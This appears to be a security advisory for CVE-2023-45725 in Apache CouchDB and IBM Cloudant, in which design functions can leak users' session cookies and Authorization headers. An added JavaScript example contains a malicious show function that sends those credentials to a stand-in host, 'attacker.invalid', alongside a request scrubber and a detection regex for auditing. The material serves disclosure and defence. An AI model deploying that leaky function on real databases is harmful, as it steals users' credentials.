Mike Rhodes

5.7 CVSS total
Vulnerabilities · 1
PT-2023-29658
5.7
2023-12-05
Apache · Apache Couchdb · CVE-2023-45725
**Name of the Vulnerable Software and Affected Versions**

Apache CouchDB versions prior to 3.3.3
IBM Cloudant versions prior to 8413

**Description**

Design document functions that receive the user's HTTP request object may expose the authorization or session cookie headers of the user who accesses the document. The affected design document functions are `list`, `show`, `rewrite`, and `update`. Because the request object passed to these functions carries the caller's `Authorization` and `Cookie` headers, a malicious function can render the session token into HTML output, embed it in the URL of an external resource so that the victim's browser sends it to an attacker-controlled host, or persist it into a document through an `update` function.

For the attack to succeed, the attacker must be able to insert design documents into the database and then induce a user to access a function from that design document. In CouchDB, writing design documents requires database admin rights, so the realistic precondition is an attacker who holds, or has obtained, that role on the target database.

**Recommendations**

For Apache CouchDB versions prior to 3.3.3, upgrade to version 3.3.3 or later. For IBM Cloudant versions prior to 8413, upgrade to version 8413 or later. As a temporary workaround, avoid deploying design documents from untrusted sources, and review existing design documents for `list`, `show`, `rewrite`, and `update` functions that read the request object's headers or cookies before serving them to users. Restrict access to the vulnerable design document functions `list`, `show`, `rewrite`, and `update` to minimize the risk of exploitation.
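The following is an added illustration written for this entry; it is not code from the advisory, the reporter, or the CouchDB project. It shows what a credential-leaking `show` function looks like when given a request object shaped like the one CouchDB passes to design functions, a request scrub in the spirit of the fix (the upstream patch itself is not reproduced), and a textual audit that flags design documents whose functions read request headers. The request object, cookie and token values, the hostname `attacker.invalid`, and both design documents are constructed for the example.

```javascript
// Added example, not from the advisory or the CouchDB project. All values are
// constructed; the request shape (headers, cookie, userCtx, method, path)
// follows what CouchDB hands to list/show/update/rewrite functions.
const sampleReq = {
  method: "GET",
  path: ["db", "_design", "evil", "_show", "leak", "doc1"],
  headers: {
    Host: "couchdb.example.internal:5984",
    Accept: "text/html",
    Cookie: "AuthSession=dXNlcjo2NTZGQjQ1Mzpyb3VuZC10cmlw-constructed",
    Authorization: "Basic dXNlcjpzM2NyM3Q=", // constructed, not a real credential
  },
  cookie: { AuthSession: "dXNlcjo2NTZGQjQ1Mzpyb3VuZC10cmlw-constructed" },
  userCtx: { name: "victim", roles: [] },
};

// A malicious show function: the victim's browser renders this HTML and, when it
// fetches the image, sends the victim's session cookie to the attacker's host.
const leakyShow = function (doc, req) {
  const cookie = (req.headers && req.headers.Cookie) || "";
  const authz = (req.headers && req.headers.Authorization) || "";
  return {
    headers: { "Content-Type": "text/html" },
    body:
      '<img src="https://attacker.invalid/c?' +
      "cookie=" + encodeURIComponent(cookie) +
      "&authz=" + encodeURIComponent(authz) + '">',
  };
};

// Mitigation in the spirit of the fix: drop credential-bearing headers (and the
// parsed cookie map) from the request object before any design function sees it.
// Illustrative only; the exact upstream change is not reproduced here.
const SENSITIVE_HEADERS = ["authorization", "cookie"];

function scrubRequest(req) {
  const headers = {};
  for (const [name, value] of Object.entries(req.headers || {})) {
    if (!SENSITIVE_HEADERS.includes(name.toLowerCase())) headers[name] = value;
  }
  const out = { ...req, headers };
  delete out.cookie; // the parsed cookie map also carries the session token
  return out;
}

// Audit: flag design documents whose shows/lists/updates/rewrites functions read
// req.headers or req.cookie (dot or bracket access). Matching is textual and only
// catches a parameter literally named req/request, so treat a hit as "read this
// function", not "confirmed malicious", and a miss as "not proven clean".
const DESIGN_FUNCTION_SECTIONS = ["shows", "lists", "updates", "rewrites"];
const HEADER_ACCESS = /\breq(uest)?\s*(\.|\[\s*["'])\s*(headers|cookie)\b/;

function auditDesignDoc(ddoc) {
  const findings = [];
  for (const section of DESIGN_FUNCTION_SECTIONS) {
    const entries = ddoc[section];
    if (!entries) continue;
    // `rewrites` is either a function string or an array of declarative rules;
    // only the function form carries code worth scanning.
    if (Array.isArray(entries)) continue;
    const items = typeof entries === "string" ? { rewrite: entries } : entries;
    for (const [name, src] of Object.entries(items)) {
      if (typeof src === "string" && HEADER_ACCESS.test(src)) {
        findings.push(`${ddoc._id}/${section}/${name}`);
      }
    }
  }
  return findings;
}

// Constructed design documents: one carrying the leaky show, one benign.
const evilDdoc = { _id: "_design/evil", shows: { leak: leakyShow.toString() } };
const benignDdoc = {
  _id: "_design/app",
  shows: { item: "function(doc, req){ return doc.title; }" },
};

function demo() {
  return {
    leakedBody: leakyShow({}, sampleReq).body,
    scrubbedBody: leakyShow({}, scrubRequest(sampleReq)).body,
    findings: auditDesignDoc(evilDdoc).concat(auditDesignDoc(benignDdoc)),
  };
}
```

Run `auditDesignDoc` over every `_design/*` document in a database (for example the rows of `GET /{db}/_design_docs?include_docs=true`) as a first pass when applying the workaround; anything it flags should be read by hand before the database is exposed to users on an unpatched build.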